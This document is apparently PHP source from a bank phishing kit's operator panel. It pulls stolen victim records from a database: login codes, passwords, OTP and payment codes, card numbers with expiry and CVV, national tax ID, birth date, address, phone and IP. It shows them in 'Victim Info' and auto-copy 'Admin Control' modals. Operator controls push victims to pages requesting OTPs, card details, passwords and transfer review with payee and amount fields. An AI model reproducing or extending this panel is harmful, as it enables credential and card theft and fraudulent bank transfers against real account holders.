\x9\x9\x9\x9	\x9\x9	\x9	\x9\x9\x9	\x9</select>\xa					\x9		\x9\x9	\x9	\x9</div>
		\x9		\x9	\x9			\x9	</div>\xa\x9			\x9\x9	\x9	\x9\x9\x9</div>\xa	\x9\x9\x9\x9\x9\x9\x9\x9\x9\x9	-->\xa	\x9\x9	\x9\x9	\x9\x9	\x9</td>
	\x9			\x9
	\x9		\x9\x9\x9			\x9<td>
	\x9	\x9\x9					\x9\x9<div class='form-check'>
	\x9\x9\x9	\x9\x9\x9\x9\x9\x9\x9	<label for='askcharsradio1{$value["id"]}' class='form-check-label'>
\x9	\x9\x9	\x9\x9		\x9			\x9<input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa				\x9\x9	\x9\x9		\x9\x9	<span>Request OTP</span>
		\x9\x9\x9		\x9\x9			\x9</label>
\x9\x9\x9\x9			\x9				</div>
				\x9		\x9	\x9	</td>
\x9	\x9\x9\x9\x9\x9\x9		</tr>
\x9	\x9\x9			\x9	\x9\xa\x9\x9	\x9	\x9	\x9	\x9<tr>
\x9	\x9\x9\x9		\x9	\x9\x9<td>\xa\x9		\x9	\x9	\x9\x9			<div class='form-check'>
\x9	\x9\x9\x9\x9\x9\x9	\x9			<label for='askcharsradio2{$value["id"]}' class='form-check-label'>\xa	\x9\x9\x9\x9	\x9	\x9	\x9	\x9\x9<input type='radio' name='status' value='13' id='askcharsradio2{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9			\x9		\x9	\x9\x9\x9	<span>Request Transfer review</span>\xa\x9		\x9\x9	\x9\x9					</label>
\x9	\x9\x9	\x9	\x9	\x9		</div>\xa			\x9\x9					\x9	<!-- Input characters -->\xa		\x9	\x9		\x9		\x9\x9<div class='form-group' style='display:none;' id='askchars2{$value["id"]}'>\xa\x9\x9\x9\x9	\x9\x9	\x9\x9\x9\x9	<div class='row' style='margin-left:5%;margin-top:5px' >\xa\x9\x9\x9\x9\x9		\x9	\x9	\x9	\x9<div class='col'>\xa		\x9\x9\x9\x9\x9		\x9\x9\x9\x9\x9	<input type='text' class='form-control' name='payeeName' id='payeeName' placeholder='Input payee name here' style='width:100%;border-color:#d6d6e5'>
	\x9	\x9		\x9\x9	\x9			\x9</div>
	\x9\x9	\x9\x9	\x9	\x9			</div>\xa	\x9		\x9\x9\x9\x9		\x9		<div class='row' style='margin-left:5%;margin-top:5px' >\xa	\x9						\x9\x9		\x9\x9<div class='col'>\xa	\x9	\x9\x9	\x9	\x9	\x9\x9\x9\x9	<input type='text' class='form-control' name='amount' id='amount' placeholder='Input amount here' style='width:100%;border-color:#d6d6e5'>
\x9\x9			\x9	\x9\x9	\x9\x9	\x9</div>\xa	\x9\x9\x9	\x9		\x9	\x9		</div>\xa\x9\x9		\x9	\x9\x9\x9\x9\x9	</div>\xa	\x9\x9		\x9\x9	\x9		</td>
	\x9			\x9\x9\x9\x9\x9	<td>\xa	\x9\x9						\x9		<div class='form-check'>
		\x9				\x9		\x9\x9\x9<label for='askcharsradio5{$value["id"]}' class='form-check-label'>\xa\x9\x9\x9\x9	\x9					\x9		<input type='radio' name='status' value='16' id='askcharsradio5{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9\x9\x9		\x9	\x9\x9		\x9\x9<span>Request Phone No.</span>
\x9\x9				\x9\x9		\x9	\x9</label>\xa			\x9	\x9\x9	\x9	\x9\x9</div>\xa	\x9	\x9\x9					\x9</td>\xa\x9		\x9\x9\x9\x9\x9\x9	</tr>\xa\x9	\x9				\x9	\x9
\x9\x9	\x9			\x9	\x9<tr>\xa\x9\x9\x9\x9			\x9	\x9\x9<td>\xa		\x9			\x9	\x9\x9\x9\x9<div class='form-check'>\xa\x9			\x9			\x9\x9	\x9\x9<label for='askcharsradio4{$value["id"]}' class='form-check-label'>
\x9		\x9	\x9		\x9		\x9		<input type='radio' name='status' value='15' id='askcharsradio4{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9				\x9\x9				\x9	<span>Request CC Info</span>\xa	\x9			\x9\x9\x9\x9			\x9</label>\xa	\x9\x9		\x9	\x9			\x9</div>
\x9	\x9\x9		\x9\x9\x9		</td>\xa			\x9	\x9	\x9		\x9<td>
				\x9\x9\x9		\x9\x9	<div class='form-check'>
\x9		\x9		\x9	\x9\x9\x9		<label for='askcharsradio3{$value["id"]}' class='form-check-label'>\xa	\x9\x9\x9\x9			\x9				\x9<input type='radio' name='status' value='14' id='askcharsradio3{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9\x9\x9\x9\x9\x9\x9\x9		\x9\x9\x9<span>Request Basic Info</span>
\x9		\x9\x9			\x9				</label>\xa\x9\x9		\x9\x9				\x9	</div>
\x9	\x9	\x9\x9\x9\x9\x9\x9	</td>
	\x9\x9\x9\x9	\x9			</tr>
\x9	\x9\x9\x9\x9				\xa\x9\x9\x9		\x9\x9			<tr>\xa	\x9\x9\x9		\x9\x9	\x9	<td>\xa\x9		\x9\x9\x9	\x9				<div class='form-check'>
			\x9\x9\x9\x9			\x9\x9\x9<label for='askcharsradio7{$value["id"]}' class='form-check-label'>
\x9	\x9		\x9				\x9\x9\x9	<input type='radio' name='status' value='18' id='askcharsradio7{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9		\x9						\x9\x9\x9\x9<span>Request Password</span>
\x9	\x9			\x9\x9	\x9\x9		</label>\xa	\x9\x9		\x9\x9			\x9\x9</div>
		\x9\x9			\x9\x9\x9	</td>
			\x9	\x9\x9			\x9<td>
\x9		\x9\x9	\x9\x9	\x9\x9	<div class='form-check'>
\x9	\x9\x9		\x9\x9\x9\x9\x9\x9	<label for='askcharsradio6{$value["id"]}' class='form-check-label'>\xa				\x9\x9		\x9\x9	\x9	\x9<input type='radio' name='status' value='17' id='askcharsradio6{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9\x9	\x9			\x9	\x9\x9\x9	<span>Loading Page</span>
	\x9\x9\x9\x9	\x9\x9	\x9	\x9	</label>
\x9\x9		\x9	\x9\x9\x9\x9	\x9</div>\xa\x9				\x9	\x9		\x9</td>\xa			\x9\x9\x9\x9\x9		</tr>\xa		\x9\x9\x9\x9\x9\x9		
		\x9\x9	\x9	\x9	\x9<tr>
	\x9\x9					\x9\x9	<td>
			\x9\x9\x9\x9\x9	\x9\x9	<div class='form-check'>
\x9\x9\x9\x9		\x9\x9\x9				<label for='askloginradio{$value["id"]}' class='form-check-label'>\xa	\x9							\x9	\x9\x9	<input type='radio' name='status' checked value='50' id='askloginradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9		\x9										<span>Request login again </span>\xa\x9	\x9			\x9\x9\x9		\x9	</label>\xa\x9	\x9					\x9\x9\x9\x9</div>\xa		\x9		\x9	\x9\x9\x9	</td>
										\x9<td>
\x9	\x9	\x9\x9			\x9\x9	<div class='form-check'>
\x9	\x9			\x9		\x9	\x9	<label for='finishradio{$value["id"]}' class='form-check-label'>\xa	\x9\x9		\x9\x9	\x9\x9\x9			<input type='radio' name='status' value='20' id='finishradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9	\x9	\x9	\x9	\x9\x9\x9		<span>Finish</span>\xa	\x9\x9		\x9\x9\x9	\x9\x9	\x9</label>
\x9\x9	\x9		\x9	\x9	\x9\x9</div>\xa	\x9	\x9\x9	\x9	\x9		</td>
\x9\x9	\x9\x9	\x9\x9		</tr>\xa\x9	\x9\x9	\x9\x9	\x9	\xa		\x9	\x9\x9		\x9</tbody>
	\x9					\x9</table>
\x9	\x9\x9\x9	\x9</div>\xa\x9	\x9	\x9	\x9<!-- End commands edit -->\xa\xa\x9	\x9		\x9\x9<div class='modal-footer' style='margin-top:-40px'>
\x9\x9	\x9\x9\x9	\x9<button type='button' class='btn btn-secondary' onclick='close_btn()' data-dismiss='modal'>Close</button>
	\x9	\x9	\x9		<button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>\xa\x9\x9		\x9		</div>
\x9\x9\x9\x9\x9	</div>\xa\x9			\x9</div>
			\x9</form>\xa	\x9\x9</div>
	\x9	"; } } if (isset($_GET["fetch_pc_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "\xa\x9\x9\x9=====\xe2\211\253 LOGIN \342\x89\xaa=====\xa			User Code : {$usrlogin}
\x9		Multi Code : {$usrcode}\xa\x9	\x9Password : {$usrpass}\xa\x9	\x9=====\xe2\x89\253 CODE \342\x89\xaa=====
	\x9	OTP Code : {$otpcode}\xa	\x9\x9Pay Code : {$paycode}
\x9	\x9=====\342\x89\xab CARD \342\x89\252=====
\x9\x9	CC Num : {$ccnum}\xa			Expiry : {$expiry}
	\x9\x9CVV : {$cvvnum}\xa		\x9=====\xe2\211\xab ADDITIONAL \xe2\x89\xaa=====
			Full Name : {$fname}\xa\x9		NIF : {$usrnif}
\x9\x9	DOB : {$dob}\xa\x9\x9\x9Address : {$usraddr}
\x9		Phone Num : {$phonenum}\xa	\x9\x9===============================
	\x9	IP : {$ip}
	\x9	UA : {$useragent}\xa\x9\x9	==============================="; echo "
		\x9\xa	\x9\x9<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-hidden='true'>\xa\x9	\x9\xa	\x9\x9\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa				\x9<input type='hidden' name='userid' value='{$value["id"]}'>
\x9				<div class='modal-dialog' role='document' style='width:500px'>\xa		\x9\x9		<div class='modal-content'>\xa\x9	\x9\x9\x9	\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>\xa			\x9\x9\x9\x9	<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Victim Info</h5>\xa\x9	\x9			\x9	<button type='button' class='close' data-dismiss='modal' aria-label='Close'>
\x9		\x9\x9\x9			<span aria-hidden='true' style='color:white'>&times;</span>
\x9\x9		\x9\x9\x9	</button>\xa\x9						</div>
	\x9\x9\x9\x9		<div class='modal-body'>
\x9\x9\x9	\x9	\x9\x9<div class='form-group'>\xa\x9	\x9			\x9\x9\x9<br>
\x9\x9		\x9			\x9<textarea id='textareafinish' class='form-control' disabled='disabled' rows='12'>{$data_log}</textarea>
\x9\x9\x9	\x9\x9\x9\x9</div>\xa\x9\x9				\x9</div>\xa		\x9	\x9	\x9<div class='modal-footer' style='margin-top:-40px'>
\x9\x9	\x9	\x9		<button type='button' class='btn btn-lg btn-dark col-12' onclick='close_btn()'>CLOSE</button>\xa		\x9	\x9		</div>
\x9		\x9		</div>\xa				\x9</div>
\x9\x9\x9	</form>
	\x9	</div>\xa\x9\x9\x9"; } } if (isset($_GET["fetch_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "
	
			<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>\xa	\x9\x9\xa\x9\x9\x9\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
\x9\x9		\x9<input type='hidden' name='userid' value='{$value["id"]}'>\xa	\x9\x9\x9	<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>\xa\x9				\x9<div class='modal-content' style='background-color: black;'>
		\x9\x9\x9\x9\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
	\x9\x9\x9\x9\x9\x9	<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>\xa\x9	\x9		\x9\x9	<button type='button' class='close' onclick='close_btn()'  aria-label='Close'>
	\x9	\x9			\x9\x9<span aria-hidden='true' style='color:white'>&times;</span>\xa\x9		\x9				</button>
\x9					\x9</div>
	\x9				\x9<div class='modal-body'>
\x9	\x9\x9	\x9\x9	<div class='form-group' style='margin-bottom:1rem'>
	\x9	\x9					<br>\xa\xa	\x9			\x9	\x9\x9<div class='data-group'>
			\x9\x9\x9			\x9<label class='data-label'>User code</label>
	\x9\x9\x9\x9\x9		\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>
\x9	\x9\x9		\x9	\x9</div>
	\x9\x9\x9		\x9		<div class='data-group'>\xa	\x9\x9\x9\x9\x9\x9\x9		<label class='data-label'>Multi code</label>\xa\x9	\x9			\x9\x9		<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrcode}'>\xa\x9			\x9	\x9\x9\x9</div>\xa	\x9		\x9	\x9\x9\x9<div class='data-group'>
\x9\x9\x9	\x9	\x9	\x9\x9<label class='data-label'>Password</label>\xa			\x9	\x9				<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrpass}'>
		\x9		\x9			</div>
\x9\x9\x9\x9		\x9\x9\x9<div class='data-group'>
					\x9\x9	\x9	<label class='data-label'>OTP</label>\xa\x9	\x9	\x9	\x9	\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$otpcode}'>\xa				\x9\x9			</div>
\x9	\x9\x9\x9\x9			<div class='data-group'>
	\x9	\x9	\x9\x9\x9		<label class='data-label'>Pay OTP</label>
		\x9\x9		\x9		\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$paycode}'>
\x9\x9\x9			\x9	\x9</div>\xa		\x9	\x9\x9	\x9\x9<div class='data-group'>\xa		\x9	\x9	\x9\x9		<label class='data-label'>Full Name</label>
	\x9		\x9\x9	\x9	\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$fname}'>
\x9		\x9\x9\x9		\x9</div>\xa\x9\x9\x9\x9	\x9\x9\x9	<div class='data-group'>\xa	\x9	\x9\x9	\x9			<label class='data-label'>DOB</label>\xa	\x9\x9\x9		\x9			<input onclick='copy_btn(this)' class='form-control' readonly value='{$dob}'>
			\x9\x9	\x9\x9	</div>\xa\x9\x9	\x9\x9\x9	\x9\x9<div class='data-group'>\xa\x9\x9		\x9\x9\x9	\x9\x9<label class='data-label'>Address</label>\xa\x9\x9			\x9			\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usraddr}'>\xa	\x9\x9	\x9				</div>
	\x9\x9	\x9	\x9\x9\x9<div class='data-group'>\xa\x9		\x9	\x9\x9			<label class='data-label'>NIF</label>\xa	\x9\x9		\x9		\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrnif}'>\xa\x9			\x9\x9		\x9</div>
	\x9			\x9	\x9\x9<div class='data-group'>\xa		\x9	\x9\x9			\x9<label class='data-label'>Phone No.</label>
										<input onclick='copy_btn(this)' class='form-control' readonly value='{$phonenum}'>\xa	\x9	\x9				\x9</div>
			\x9\x9\x9	\x9	<div class='data-group'>\xa			\x9	\x9	\x9\x9\x9<label class='data-label'>CC No.</label>\xa\x9			\x9\x9	\x9\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$ccnum}'>
\x9\x9\x9	\x9		\x9\x9</div>
\x9\x9			\x9			<div class='data-group'>
\x9	\x9		\x9\x9\x9\x9	<label class='data-label'>Expiry/CVV</label>\xa	\x9			\x9			\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$expiry}/{$cvvnum}'>
		\x9		\x9\x9	\x9</div>\xa		\x9\x9\x9		\x9	<div class='data-group'>
\x9			\x9\x9\x9\x9\x9	<label class='data-label'>IP/Device</label>
\x9\x9\x9\x9				\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>\xa	\x9\x9\x9\x9	\x9\x9\x9</div>
			\x9			\x9\x9<br>
\x9\x9	\x9	\x9\x9\x9</div>
\x9\x9	\x9		\xa		\x9	\x9\x9\x9\x9<!-- END -->\xa\x9\x9\x9\x9	\x9
			\x9	\x9	\x9<table style='width: 100%;background-color: black;color: white;padding: 10%;'>
		\x9	\x9\x9\x9\x9\x9<tbody style='line-height:100%;'>\xa	\x9\x9\x9
	\x9	\x9					\x9<tr>
\x9		\x9\x9\x9			\x9\x9<td>
	\x9\x9	\x9		\x9	\x9		<div class='form-check'>\xa	\x9	\x9	\x9\x9\x9		\x9\x9\x9<label for='askcharsradio0{$value["id"]}' class='form-check-label'>
	\x9\x9	\x9	\x9							<input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa	\x9	\x9		\x9\x9\x9\x9	\x9\x9\x9<span>Request Multi-code</span>
										\x9\x9\x9</label>
\x9			\x9\x9			\x9	\x9</div>\xa		\x9\x9	\x9		\x9\x9	\x9<!-- Input characters 
		\x9\x9\x9	\x9\x9\x9	\x9	<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>\xa	\x9\x9	\x9\x9\x9	\x9\x9			<div class='row' style='margin-left:5%;margin-top:5px' >\xa	\x9\x9			\x9		\x9\x9\x9		<div class='col'>\xa\x9\x9\x9\x9	\x9\x9\x9\x9	\x9\x9			<select class='form-control' name='char1'>\xa	\x9\x9\x9\x9	\x9	\x9		\x9		\x9	<option value='1\xc2\252'>1\302\xaa</option>
	\x9		\x9\x9\x9\x9\x9\x9\x9\x9	\x9		<option value='2\302\252'>2\302\xaa</option>\xa	\x9\x9			\x9		\x9	\x9	\x9		<option value='3\302\252'>3\xc2\252</option>
		\x9		\x9\x9			\x9\x9	\x9\x9\x9<option value='4\xc2\252'>4\302\xaa</option>
	\x9				\x9		\x9\x9\x9	\x9	\x9<option value='5\xc2\252'>5\302\252</option>\xa	\x9		\x9\x9\x9\x9\x9\x9\x9	\x9	\x9	<option value='6\302\252'>6\xc2\252</option>\xa		\x9	\x9\x9\x9					\x9		\x9<option value='7\xc2\252'>7\302\xaa</option>\xa	\x9					\x9	\x9		\x9\x9\x9\x9<option value='8\xc2\252'>8\xc2\xaa</option>
\x9								\x9\x9\x9		\x9\x9<option value='9\302\xaa'>9\xc2\xaa</option>\xa	\x9	\x9	\x9	\x9\x9	\x9				\x9<option value='10\302\252'>10\xc2\xaa</option>\xa			\x9\x9		\x9\x9				\x9		<option value='11\302\252'>11\302\xaa</option>
\x9\x9		\x9\x9					\x9\x9		\x9<option value='12\xc2\xaa'>12\302\xaa</option>\xa\x9\x9\x9							\x9\x9				<option value='13\xc2\xaa'>13\xc2\xaa</option>
\x9\x9\x9			\x9	\x9\x9		\x9		</select>
\x9	\x9				\x9\x9					</div>\xa\x9\x9					\x9\x9	\x9\x9		<div class='col'>\xa\x9				\x9		\x9\x9			\x9	<select class='form-control' name='char2'>\xa	\x9					\x9		\x9\x9\x9		\x9<option value='1\302\252'>1\xc2\252</option>
\x9	\x9	\x9	\x9\x9\x9			\x9\x9\x9\x9<option value='2\xc2\xaa'>2\302\252</option>
\x9			\x9\x9\x9	\x9\x9		\x9	\x9\x9<option value='3\302\252'>3\xc2\252</option>\xa\x9\x9\x9	\x9	\x9				\x9		\x9\x9<option value='4\302\xaa'>4\xc2\xaa</option>
\x9\x9		\x9	\x9	\x9\x9	\x9\x9\x9\x9	<option value='5\302\252'>5\302\252</option>\xa\x9\x9			\x9			\x9\x9	\x9	\x9	<option value='6\xc2\xaa'>6\xc2\252</option>\xa\x9		\x9	\x9\x9\x9	\x9\x9\x9\x9\x9\x9\x9<option value='7\302\xaa'>7\xc2\xaa</option>\xa\x9	\x9\x9	\x9	\x9\x9\x9\x9	\x9	\x9	<option value='8\302\xaa'>8\302\252</option>
\x9\x9	\x9		\x9\x9	\x9\x9\x9				<option value='9\302\xaa'>9\302\xaa</option>
\x9\x9\x9	\x9					\x9	\x9\x9\x9	<option value='10\xc2\xaa'>10\302\xaa</option>
	\x9	\x9\x9\x9		\x9\x9\x9	\x9		\x9<option value='11\xc2\xaa'>11\xc2\252</option>\xa	\x9									\x9		\x9\x9<option value='12\302\xaa'>12\302\xaa</option>
\x9\x9		\x9	\x9	\x9		\x9\x9	\x9	<option value='13\xc2\252'>13\302\xaa</option>
\x9	\x9				\x9\x9		\x9		\x9</select>\xa\x9\x9	\x9			\x9\x9\x9			\x9</div>
\x9\x9\x9\x9\x9\x9\x9\x9\x9\x9		\x9	<div class='col'>
\x9\x9		\x9\x9					\x9	\x9	<select class='form-control' name='char3'>
\x9\x9			\x9				\x9		\x9\x9	<option value='1\xc2\xaa'>1\xc2\xaa</option>\xa	\x9\x9\x9	\x9\x9\x9\x9		\x9		\x9	<option value='2\302\252'>2\302\252</option>
		\x9			\x9	\x9	\x9	\x9	\x9	<option value='3\302\xaa'>3\xc2\xaa</option>
					\x9	\x9\x9	\x9\x9	\x9\x9	<option value='4\xc2\xaa'>4\xc2\xaa</option>
\x9	\x9\x9	\x9	\x9	\x9\x9\x9\x9\x9	\x9<option value='5\302\252'>5\xc2\252</option>\xa	\x9\x9\x9	\x9\x9	\x9\x9		\x9	\x9\x9<option value='6\xc2\xaa'>6\302\xaa</option>
\x9\x9\x9\x9\x9				\x9\x9	\x9	\x9	<option value='7\xc2\252'>7\xc2\252</option>
\x9	\x9\x9\x9\x9\x9	\x9				\x9\x9	<option value='8\302\xaa'>8\302\252</option>\xa	\x9		\x9			\x9	\x9			\x9\x9<option value='9\xc2\xaa'>9\302\252</option>\xa\x9					\x9			\x9	\x9\x9\x9\x9<option value='10\302\xaa'>10\302\xaa</option>\xa			\x9		\x9\x9\x9\x9	\x9\x9\x9		<option value='11\302\xaa'>11\xc2\252</option>\xa	\x9	\x9			\x9\x9	\x9\x9	\x9		<option value='12\302\252'>12\302\252</option>\xa				\x9			\x9	\x9\x9	\x9	\x9<option value='13\xc2\252'>13\xc2\252</option>
							\x9		\x9\x9\x9\x9	</select>\xa	\x9\x9\x9\x9		\x9	\x9				</div>\xa\x9		\x9					\x9\x9\x9	</div>\xa			\x9		\x9\x9\x9	\x9	</div>\xa	\x9					\x9\x9	\x9	-->\xa\x9\x9\x9	\x9			\x9\x9	</td>\xa\x9\x9		\x9\x9\xa	\x9		\x9\x9	\x9\x9\x9\x9<td>
				\x9\x9\x9\x9			\x9<div class='form-check'>
	\x9\x9\x9		\x9\x9		\x9\x9\x9<label for='askcharsradio1{$value["id"]}' class='form-check-label'>
					\x9\x9	\x9\x9			\x9<input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
					\x9	\x9		\x9\x9\x9\x9<span>Request OTP</span>
\x9\x9\x9\x9\x9\x9			\x9\x9\x9\x9</label>
\x9	\x9\x9\x9				\x9		</div>
\x9	\x9			\x9	\x9	\x9</td>\xa	\x9				\x9\x9	\x9</tr>
\x9\x9\x9							
\x9			\x9	\x9			<tr>\xa	\x9			\x9			\x9	<td>
		\x9\x9\x9\x9	\x9		\x9\x9<div class='form-check'>\xa	\x9\x9\x9\x9\x9\x9\x9			\x9\x9<label for='askcharsradio2{$value["id"]}' class='form-check-label'>
\x9\x9\x9\x9	\x9\x9\x9\x9			\x9\x9<input type='radio' name='status' value='13' id='askcharsradio2{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa		\x9		\x9	\x9	\x9\x9		\x9<span>Request Transfer review</span>
\x9						\x9				\x9</label>\xa\x9\x9\x9				\x9\x9		\x9</div>
					\x9	\x9		\x9	<!-- Input characters -->
\x9	\x9		\x9		\x9\x9\x9	<div class='form-group' style='display:none;' id='askchars2{$value["id"]}'>\xa	\x9\x9		\x9\x9			\x9		<div class='row' style='margin-left:5%;margin-top:5px' >\xa\x9\x9\x9\x9		\x9				\x9		<div class='col'>\xa		\x9\x9			\x9\x9		\x9\x9		<input type='text' class='form-control' name='payeeName' id='payeeName' placeholder='Input payee name here' style='width:100%;border-color:#d6d6e5'>\xa\x9	\x9\x9	\x9\x9	\x9\x9\x9\x9	\x9</div>
\x9\x9	\x9	\x9\x9\x9			\x9	</div>
				\x9\x9		\x9	\x9		<div class='row' style='margin-left:5%;margin-top:5px' >
				\x9\x9	\x9\x9			\x9\x9<div class='col'>
		\x9\x9\x9	\x9\x9			\x9			<input type='text' class='form-control' name='amount' id='amount' placeholder='Input amount here' style='width:100%;border-color:#d6d6e5'>
	\x9		\x9	\x9			\x9\x9		</div>
	\x9		\x9					\x9	\x9</div>\xa\x9						\x9\x9\x9\x9	</div>
\x9			\x9	\x9\x9\x9		</td>\xa	\x9\x9\x9\x9	\x9\x9	\x9	<td>
\x9		\x9	\x9\x9	\x9\x9		<div class='form-check'>\xa			\x9	\x9\x9	\x9\x9\x9		<label for='askcharsradio5{$value["id"]}' class='form-check-label'>
	\x9\x9\x9\x9\x9	\x9\x9\x9\x9\x9	\x9<input type='radio' name='status' value='16' id='askcharsradio5{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa	\x9\x9	\x9\x9	\x9\x9\x9\x9\x9\x9	<span>Request Phone No.</span>\xa	\x9\x9\x9			\x9\x9	\x9\x9	</label>\xa\x9\x9\x9	\x9\x9\x9\x9	\x9		</div>
\x9\x9	\x9\x9		\x9	\x9	</td>
		\x9\x9\x9\x9\x9\x9\x9\x9</tr>\xa\x9\x9	\x9\x9					\xa\x9\x9		\x9\x9\x9\x9\x9\x9<tr>\xa\x9\x9						\x9	\x9<td>
	\x9	\x9	\x9						<div class='form-check'>
	\x9\x9\x9\x9\x9	\x9	\x9\x9		<label for='askcharsradio4{$value["id"]}' class='form-check-label'>
							\x9\x9\x9	\x9\x9	<input type='radio' name='status' value='15' id='askcharsradio4{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9			\x9\x9	\x9				\x9\x9<span>Request CC Info</span>\xa\x9				\x9\x9	\x9	\x9\x9	</label>
	\x9\x9	\x9	\x9		\x9\x9	</div>\xa	\x9		\x9	\x9\x9			</td>
\x9		\x9\x9	\x9\x9		\x9<td>\xa			\x9		\x9\x9\x9\x9		<div class='form-check'>
\x9			\x9\x9\x9		\x9\x9\x9\x9<label for='askcharsradio3{$value["id"]}' class='form-check-label'>\xa	\x9		\x9	\x9\x9\x9\x9				<input type='radio' name='status' value='14' id='askcharsradio3{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
		\x9			\x9\x9\x9		\x9		<span>Request Basic Info</span>
					\x9				\x9	\x9</label>\xa	\x9			\x9	\x9		\x9\x9</div>\xa\x9	\x9	\x9\x9	\x9\x9		</td>\xa\x9\x9				\x9			</tr>\xa		\x9\x9	\x9	\x9	\x9
				\x9	\x9		\x9<tr>
	\x9\x9	\x9	\x9		\x9\x9<td>\xa\x9		\x9\x9\x9					\x9<div class='form-check'>\xa				\x9\x9	\x9				\x9<label for='askcharsradio7{$value["id"]}' class='form-check-label'>\xa\x9		\x9\x9\x9	\x9	\x9\x9\x9	\x9<input type='radio' name='status' value='18' id='askcharsradio7{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9						\x9\x9\x9	\x9		<span>Request Password</span>
\x9	\x9\x9\x9\x9		\x9\x9	\x9\x9</label>
\x9	\x9	\x9	\x9\x9\x9\x9\x9\x9</div>\xa	\x9\x9		\x9					</td>
		\x9\x9\x9\x9				\x9<td>
\x9				\x9\x9		\x9\x9\x9<div class='form-check'>\xa				\x9\x9\x9\x9			\x9	<label for='askcharsradio6{$value["id"]}' class='form-check-label'>
	\x9		\x9	\x9	\x9\x9			\x9<input type='radio' name='status' value='17' id='askcharsradio6{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9	\x9			\x9\x9\x9	\x9\x9\x9<span>Loading Page</span>\xa				\x9	\x9\x9\x9\x9\x9\x9	</label>
\x9	\x9\x9\x9		\x9\x9	\x9\x9</div>
\x9	\x9\x9\x9	\x9\x9	\x9	</td>\xa\x9\x9		\x9	\x9	\x9	</tr>\xa		\x9	\x9		\x9\x9	
\x9\x9	\x9		\x9			<tr>
\x9\x9\x9	\x9\x9\x9\x9	\x9\x9<td>
						\x9\x9	\x9		<div class='form-check'>\xa			\x9\x9\x9\x9\x9	\x9			<label for='askloginradio{$value["id"]}' class='form-check-label'>\xa\x9		\x9		\x9\x9\x9\x9\x9\x9	\x9<input type='radio' name='status' checked value='50' id='askloginradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9			\x9	\x9	\x9\x9\x9\x9\x9\x9<span>Request login again </span>
